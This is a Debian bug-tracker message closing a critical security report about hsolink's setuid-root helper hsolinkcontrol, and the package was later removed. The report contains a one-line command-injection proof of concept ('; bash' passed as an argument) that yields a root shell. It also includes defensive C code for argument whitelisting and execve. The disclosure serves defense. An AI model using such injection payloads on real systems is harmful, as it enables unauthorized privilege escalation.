Your message dated Thu, 29 Jul 2010 17:46:00 -0400 with message-id <20100729214600.GA19629@galadriel.inutil.org> and subject line Re: insecure setuid usage, local root exploit has caused the Debian Bug report #590670, regarding insecure setuid usage, local root exploit, to be marked as done.

This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact owner@bugs.debian.org immediately.)

--
590670: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590670
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message ---
- To: submit@bugs.debian.org
- Subject: insecure setuid usage, local root exploit
- From: Thijs Kinkhorst <thijs@debian.org>
- Date: Wed, 28 Jul 2010 13:09:06 +0200
- Message-id: <201007281309.11718.thijs@debian.org>
Package: hsolink
Version: 1.0.118-3
Severity: critical
Tags: security

Hi,

Following was reported by Christian Jaeger.

----------

hsolink-1.0.118 contains a binary hsolinkcontrol that is setuid root.
The binary
- neither sets PATH
- nor fixes other environment variables
- nor checks commandline arguments
- but uses system(3)
(- and may be overflowing fixed-size buffers as well, I didn't check anymore)
and thus is a trivial target to get root, for example:

(I've tested from the files in an ar-unpacked .deb instead of installing the deb, to avoid exposing my system. Note: apparently the binary has to be at root-owned paths or the Linux kernel will ignore the setuid bit.)

novo:~/chris# l -a
total 12
-rwsr-xr-x  1 root root  7072 2010-07-09 22:20 hsolinkcontrol
drwxr-x---  2 root chris   80 2010-07-09 22:55 .
drwxr-xr-x 50 root root  4272 2010-07-09 22:55 ..
chris@novo:/root/chris$ ./hsolinkcontrol down '; bash'
Using resolvconf.
root@novo:/root/chris# id
uid=0(root) gid=1000(chris) groups=.....

The setuid recommendation is coming from the upstream author (http://www.pharscape.org/hsolinkcontrol.html), who apparently is not aware of the implications of the setuid bit, and good security in general as evidenced by the problems I've listed above. I have not informed him of the problem [yet].

I don't know about the right solution; maybe using sudo instead of setuid and adding commandline argument checking and replacing system calls with fork/exec* calls. Or, to be safer, instead rather turn it into a daemon. Iff it needs to be run as ordinary users at all--I'm used to having to run "pon" as root, for example, the charge to enable a normal user to run hsolinkcontrol (or the program that uses it) as root (by setting up sudo, for example) could possibly just be left to the user (I can't say as I haven't used the program yet).

----------

Debian has assigned CVE-2010-1671 to this issue.

Cheers,
Thijs
--- End Message ---
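As an added example, written here and not taken from hsolinkcontrol or from the bug report, this is the pattern the report recommends for a setuid helper: an exact whitelist check of the command-line argument and a fork/execve with a fixed argv and environment instead of system(3). The action words "up"/"down" and the script path /usr/sbin/hsolink-action are assumptions (the path is a placeholder).

```c
/* Added example, not hsolinkcontrol's code: whitelist the argument and
 * run the privileged step via fork/execve with a fixed environment.
 * Assumed: the helper only needs the actions "up" and "down"; the
 * script path below is a hypothetical placeholder. */
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define ACTION_SCRIPT "/usr/sbin/hsolink-action"  /* placeholder path */

/* Accept only an exact, whitelisted action word. Anything else, such as
 * "down '; bash'", is refused before any privileged operation runs. */
int valid_action(const char *arg)
{
    static const char *const allowed[] = { "up", "down" };
    size_t i;
    if (arg == NULL)
        return 0;
    for (i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(arg, allowed[i]) == 0)
            return 1;
    return 0;
}

/* Run the helper with a fixed argv and a fixed environment, never through
 * a shell, so the caller's PATH, IFS or LD_* variables cannot interfere.
 * Returns the child's exit status, or -1 on refusal or failure. */
int run_action(const char *action)
{
    char *const argv[] = { ACTION_SCRIPT, (char *)action, NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    pid_t pid;
    int status;

    if (!valid_action(action))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(ACTION_SCRIPT, argv, envp);
        _exit(127);          /* exec failed; never fall back to a shell */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A sudo rule restricted to the same two literal arguments would give the same effect without a setuid bit, which is the alternative the report also mentions.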
--- Begin Message ---
- To: Thijs Kinkhorst <thijs@debian.org>
- Cc: 590670-done@bugs.debian.org
- Subject: Re: insecure setuid usage, local root exploit
- From: Moritz Muehlenhoff <jmm@inutil.org>
- Date: Thu, 29 Jul 2010 17:46:00 -0400
- Message-id: <20100729214600.GA19629@galadriel.inutil.org>
- In-reply-to: <201007281309.11718.thijs@debian.org>
- References: <201007281309.11718.thijs@debian.org>
On Wed, Jul 28, 2010 at 01:09:06PM +0200, Thijs Kinkhorst wrote:
> Package: hsolink
> Version: 1.0.118-3
> Severity: critical
> Tags: security
>
> Hi,
>
> Following was reported by Christian Jaeger.
>
> ----------
>
> hsolink-1.0.118 contains a binary hsolinkcontrol that is setuid root.
> The binary

I have filed a removal bug and hsolink has been removed (#590751).

Closing the bug.

Cheers,
Moritz
--- End Message ---